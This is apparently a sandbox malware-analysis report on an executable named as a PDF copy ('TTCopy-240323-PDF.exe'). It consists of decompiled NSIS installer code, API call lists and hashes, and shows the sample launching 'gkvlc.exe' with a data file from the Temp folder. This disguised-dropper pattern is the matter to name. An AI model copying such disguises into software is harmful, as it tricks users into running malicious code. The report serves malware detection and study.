							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                            0x00403d1d
                                                                                            0x00403d26
                                                                                            0x00403d2d
                                                                                            0x00403d2f
                                                                                            0x00403d43
                                                                                            0x00403d55
                                                                                            0x00403d5e
                                                                                            0x00403d67
                                                                                            0x00403d6e
                                                                                            0x00403d73
                                                                                            0x00403d7a
                                                                                            0x00403d8d
                                                                                            0x00403d8d
                                                                                            0x00403d98
                                                                                            0x00403d31
                                                                                            0x00403d3c
                                                                                            0x00403d3c
                                                                                            0x00403d9d
                                                                                            0x00403da7
                                                                                            0x00403db0
                                                                                            0x00403db5
                                                                                            0x00403dc6
                                                                                            0x00403e58
                                                                                            0x00403e60
                                                                                            0x00403e69
                                                                                            0x00403e69
                                                                                            0x00403e7f
                                                                                            0x00403e85
                                                                                            0x00403e93
                                                                                            0x00403f14
                                                                                            0x00403f1c
                                                                                            0x00403f26
                                                                                            0x00403f2b
                                                                                            0x00403f31
                                                                                            0x00403fbb
                                                                                            0x00403fc0
                                                                                            0x00403fc2
                                                                                            0x00403fde
                                                                                            0x00000000
                                                                                            0x00403fde
                                                                                            0x00403fc4
                                                                                            0x00403fca
                                                                                            0x00403fd2
                                                                                            0x00403fd2
                                                                                            0x00000000
                                                                                            0x00403fca
                                                                                            0x00403f3f
                                                                                            0x00403f4a
                                                                                            0x00403f4f
                                                                                            0x00403f51
                                                                                            0x00403f58
                                                                                            0x00403f58
                                                                                            0x00403f63
                                                                                            0x00403f6b
                                                                                            0x00403f6d
                                                                                            0x00403f6f
                                                                                            0x00403f78
                                                                                            0x00403f7b
                                                                                            0x00403f81
                                                                                            0x00403f81
                                                                                            0x00403fa0
                                                                                            0x00403fb1
                                                                                            0x00000000
                                                                                            0x00403fb6
                                                                                            0x00403f1e
                                                                                            0x00403f20
                                                                                            0x00000000
                                                                                            0x00403e95
                                                                                            0x00403e95
                                                                                            0x00403ea1
                                                                                            0x00403eab
                                                                                            0x00403eb1
                                                                                            0x00403eb6
                                                                                            0x00403ec5
                                                                                            0x00403fe3
                                                                                            0x00403fe3
                                                                                            0x00000000
                                                                                            0x00403fe3
                                                                                            0x00403ed4
                                                                                            0x00403f0f
                                                                                            0x00000000
                                                                                            0x00403f0f
                                                                                            0x00403dcc
                                                                                            0x00403dcc
                                                                                            0x00403dcf
                                                                                            0x00403dd1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403ddf
                                                                                            0x00403df1
                                                                                            0x00403df6
                                                                                            0x00403dff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403e05
                                                                                            0x00403e07
                                                                                            0x00403e14
                                                                                            0x00403e14
                                                                                            0x00403e1d
                                                                                            0x00403e23
                                                                                            0x00403e4b
                                                                                            0x00403e53
                                                                                            0x00000000
                                                                                            0x00403e35
                                                                                            0x00403e36
                                                                                            0x00403e3f
                                                                                            0x00403e45
                                                                                            0x00403e46
                                                                                            0x00000000
                                                                                            0x00403e46
                                                                                            0x00403e41
                                                                                            0x00403e43
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403e43
                                                                                            0x00403e23

                                                                                            APIs
                                                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,?,?,?,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,746AFAA0), ref: 00403E18
                                                                                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,?,?,?,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                            • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,?,00000000,?), ref: 00403E36
                                                                                            • LoadImageW.USER32 ref: 00403E7F
                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                            • RegisterClassW.USER32 ref: 00403EBC
                                                                                            • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                            • CreateWindowExW.USER32 ref: 00403F09
                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                            • GetClassInfoW.USER32 ref: 00403F6B
                                                                                            • GetClassInfoW.USER32 ref: 00403F78
                                                                                            • RegisterClassW.USER32 ref: 00403F81
                                                                                            • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 1975747703-2261931871
                                                                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                            C-Code - Quality: 98%
                                                                                            			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\engineer\\Desktop", L"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                                                            0x004030db
                                                                                            0x004030de
                                                                                            0x004030e1
                                                                                            0x004030fb
                                                                                            0x00403100
                                                                                            0x00403113
                                                                                            0x00403118
                                                                                            0x0040311e
                                                                                            0x00000000
                                                                                            0x00403120
                                                                                            0x00403131
                                                                                            0x00403142
                                                                                            0x00403149
                                                                                            0x00403151
                                                                                            0x00403156
                                                                                            0x00403158
                                                                                            0x00403243
                                                                                            0x00403245
                                                                                            0x00403251
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040325a
                                                                                            0x00403286
                                                                                            0x0040328b
                                                                                            0x00403296
                                                                                            0x00403298
                                                                                            0x004032a9
                                                                                            0x004032c4
                                                                                            0x004032cd
                                                                                            0x004032d2
                                                                                            0x004032f1
                                                                                            0x00403301
                                                                                            0x00403313
                                                                                            0x00403318
                                                                                            0x00403320
                                                                                            0x0040332d
                                                                                            0x00403335
                                                                                            0x0040333a
                                                                                            0x0040333c
                                                                                            0x0040333c
                                                                                            0x00403344
                                                                                            0x00403344
                                                                                            0x00403347
                                                                                            0x00403348
                                                                                            0x00403348
                                                                                            0x0040334b
                                                                                            0x0040334d
                                                                                            0x0040334d
                                                                                            0x00403357
                                                                                            0x00403363
                                                                                            0x00000000
                                                                                            0x00403368
                                                                                            0x00000000
                                                                                            0x00403320
                                                                                            0x00000000
                                                                                            0x004032d4
                                                                                            0x00403262
                                                                                            0x00403274
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040315e
                                                                                            0x00403163
                                                                                            0x00403168
                                                                                            0x0040316c
                                                                                            0x00403173
                                                                                            0x0040317a
                                                                                            0x0040317c
                                                                                            0x0040317c
                                                                                            0x00403187
                                                                                            0x004032e0
                                                                                            0x00403322
                                                                                            0x00000000
                                                                                            0x00403322
                                                                                            0x00403194
                                                                                            0x00403214
                                                                                            0x00403218
                                                                                            0x0040321d
                                                                                            0x00000000
                                                                                            0x00403214
                                                                                            0x0040319d
                                                                                            0x004031a2
                                                                                            0x004031aa
                                                                                            0x004031d0
                                                                                            0x004031df
                                                                                            0x004031e5
                                                                                            0x004031ea
                                                                                            0x004031f0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004031fa
                                                                                            0x00403202
                                                                                            0x00403205
                                                                                            0x0040320a
                                                                                            0x0040320c
                                                                                            0x0040320c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004031fa
                                                                                            0x0040321e
                                                                                            0x00403224
                                                                                            0x00403230
                                                                                            0x00403230
                                                                                            0x00403233
                                                                                            0x00403239
                                                                                            0x00403239
                                                                                            0x00403241
                                                                                            0x00000000
                                                                                            0x00403241

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,00000400), ref: 00403100
                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 0040615C
                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 00403149
                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TTCopy-240323-PDF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-4238767266
                                                                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                            C-Code - Quality: 77%
                                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                            0x0040176f
                                                                                            0x00401776
                                                                                            0x00401782
                                                                                            0x00401785
                                                                                            0x0040178a
                                                                                            0x0040178d
                                                                                            0x00401794
                                                                                            0x004017b0
                                                                                            0x00401796
                                                                                            0x00401797
                                                                                            0x00401797
                                                                                            0x004017b6
                                                                                            0x004017bb
                                                                                            0x004017bb
                                                                                            0x004017bf
                                                                                            0x004017c2
                                                                                            0x004017c7
                                                                                            0x004017c9
                                                                                            0x004017cb
                                                                                            0x004017d0
                                                                                            0x004017d0
                                                                                            0x004017db
                                                                                            0x004017db
                                                                                            0x004017ec
                                                                                            0x004017ee
                                                                                            0x004017ee
                                                                                            0x004017ef
                                                                                            0x004017ef
                                                                                            0x004017f2
                                                                                            0x004017f5
                                                                                            0x004017f8
                                                                                            0x004017f8
                                                                                            0x004017ff
                                                                                            0x0040180e
                                                                                            0x00401813
                                                                                            0x00401816
                                                                                            0x00401819
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040181b
                                                                                            0x0040181e
                                                                                            0x00401874
                                                                                            0x00401879
                                                                                            0x004015b6
                                                                                            0x0040292e
                                                                                            0x0040292e
                                                                                            0x00402c2a
                                                                                            0x00402c2d
                                                                                            0x00402c2d
                                                                                            0x00000000
                                                                                            0x00401820
                                                                                            0x00401826
                                                                                            0x0040182d
                                                                                            0x0040183a
                                                                                            0x00401845
                                                                                            0x0040185b
                                                                                            0x0040185b
                                                                                            0x0040185e
                                                                                            0x00000000
                                                                                            0x00401864
                                                                                            0x00401864
                                                                                            0x00401865
                                                                                            0x00401882
                                                                                            0x00402c33
                                                                                            0x00402c33
                                                                                            0x00402c33
                                                                                            0x00401867
                                                                                            0x00401867
                                                                                            0x00401868
                                                                                            0x00401493
                                                                                            0x0040239d
                                                                                            0x0040239d
                                                                                            0x0040239d
                                                                                            0x00401865
                                                                                            0x0040185e
                                                                                            0x00402c35
                                                                                            0x00402c39
                                                                                            0x00402c39
                                                                                            0x00401892
                                                                                            0x00401897
                                                                                            0x004018a5
                                                                                            0x004018aa
                                                                                            0x004018b0
                                                                                            0x004018b4
                                                                                            0x004018b6
                                                                                            0x004018be
                                                                                            0x004018ca
                                                                                            0x004018b8
                                                                                            0x004018b8
                                                                                            0x004018bc
                                                                                            0x00000000
